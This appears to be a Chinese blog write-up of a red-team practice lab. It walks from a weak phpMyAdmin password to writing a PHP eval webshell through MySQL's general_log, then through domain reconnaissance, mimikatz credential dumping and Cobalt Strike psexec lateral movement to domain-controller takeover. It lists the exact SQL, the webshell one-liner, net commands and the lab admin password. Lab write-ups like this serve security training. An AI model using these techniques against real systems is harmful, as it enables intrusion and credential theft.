• 红队评估实战靶场(1)


    0x00前言

    [滑稽][滑稽]又是我,我又来发水文了,这几天打靶机打上瘾了,再来更新篇靶机的文章

    0x01 靶机渗透

    配置好靶机后,这里需要打开win7,来到c盘目录下启动phpstudy

    启动完成后,就可以开始了,这里的要求是从web打点打进去。这里发现用的phpstudy应该是有后门的,可以用,phpstudy的exp来打一下。但是我们这里还是遵守一下规则,走个正常流程

    这里就先打开御剑,扫描一下目录

    有个beifen.rar的压缩包,猜想一下,应该是备份的拼音[手动滑稽][手动滑稽]

    发现是个yxcms的网站,浏览器进行打开

    果不其然就是个yxcms的网站,先对他进行保存,然后再来翻找一下phpinfo页面来保存一下他的绝对路径等会可能会用到

    绝对路径:

    C:/phpStudy/WWW

    现在再来翻找一下phpmyadmin的目录。

    来尝试一下弱口令 phpmyadmin的默认口令root/root,一试之下居然进去了,进入后的第一步肯定是写shell。看看能不能用into outfile来写shell。
    into outfile 的写入条件是 "secure_file_priv"不能为null要为空才能进行写入。
    先用sql语句来查看一下

    SHOW VARIABLES LIKE "secure_file_priv"

    显示为null 无法直接使用into outfile继续写入,那么这里还可以尝试使用日志来写shell

    show variables like '%general%';

    查看日志是否开启

    SET GLOBAL general_log='on'

    开启日志

    SET GLOBAL general_log_file='C:phpStudyWWWxxx.php'

    设置日志的文章为php文件
    这里得填2个反斜杠

    SELECT '<?php eval($_POST["cmd"]);?>'

    然后就可以直接查询一句话就会写入到我们的日子里面,也就是xxx.php里面去。

    访问xxx.php 看看文件是否存在

    这里显示了一些查询内容,并没有显示一句话的代码出来说明,一句话已经被执行了

    直接使用蚁剑连接

    成功拿下webshell
    查询一下当前权限

    whoami

    当前是个域管理员的权限,在来对该机器对一系列的信息收集

    1.ipconfig /all  
    
    2.systeminfo 
      
    3.net config workstation 查看当前登录域 和用户登录信息
    
    4.net time /domain  查看主域控时间
    

    看到对方机器确实在域环境里面,dns的普遍会搭载在域控机器上,在于里面都是以dns去定位机器的位置的

    这里还发现机器拥有2块网卡,一块网卡应该是开放web服务,而另一块则是与内网进行连通

    再来判断该机器是否在域中

    net localgroup administrators 
    
    net user /domain
    
    net group /domain
    
    net group "Domain Admins" /domain
    
    net group "Domain Controllers" /domain
    
    

    目前就知道了域控名字为OWA

    ping owa.god.org

    ping一下域控的主机名直接拿到域控的ip,定位域控的位置

    接下来就直接交给cs去完成了

    使用http的隧道能直接上线

    使用cs扫描52网段的主机存活

    portscan 192.168.52.0/24 445 arp 200

    机器上线的时候就发现没有uac能直接提权,运行mimikatz 抓取密码

    域管理员的密码为:

    hongrisec@2019.

    尝试直接psexec进行登录到192.168.52.141的机器上面去,尝试过后发现并不能上线,可能是对方的机器http无法出网。
    那么这里就直接添加一个smb的直连模式然后进行psexec的登陆

    这里就直接上线成功了

    这里能成功上线但是运行mimikatz抓取密码会失败,只能使用hashdump抓取密码

    上传procdump 来抓取lsass进程,然后到本地来使用mimiktz解密

    这里使用procdump和mimikatz都失败了,原因可能是03主机的缘故,不兼容。

    既然抓不了明文密码的话,那么就把他个代理出来,然后使用采集到的密码去跑

    前面采用ew开启socket的时候,也没做截图 就不演示了 ,尝试着使用http的reg正向代理看看能不能代理出来

    但是我这使用reg代理的时候又出现问题了 ,不知道是我配置问题还是怎么样根本就连接不上,按理来说http是能出网的

    接下来就尝试直接使用同样的方式使用administrator的用户密码去进行psexec登录 登录到域控

    成功拿下域控机器

    0x02 结尾

    在后面的时间里面又去下载了个ladon,发现ladon的功能太强了,而且还能集成在cs里面,以前也是知道,没有真的去用过,内网中想要快速探测必不可少的工具还有个就nbtscan 这里因为就3台机器,就没必要在上传ntbtscan去扫描了。cs的功能虽然是很强大,也集成了很多横向移动的工具,但是都被阉割掉部分的功能。这靶机在做前就知道密码都那同样的一样密码,在后面的渗透就会变得没意思

  • 相关阅读:
    SpringCloud 基础知识
    Spring 相关知识
    Java JDBC学习笔记
    Java JVM 相关基础知识
    ES6 块状绑定
    Docker 安装(window7)及基本命令
    Node.js 安装(Window7)及基本npm命令
    flask 模型类中relationship的使用及其参数backref的说明,
    flask中的状态保持(cookie,session)
    flask中request的属性说明
  • 原文地址:https://www.cnblogs.com/nice0e3/p/13051655.html
Copyright © 2020-2023  润新知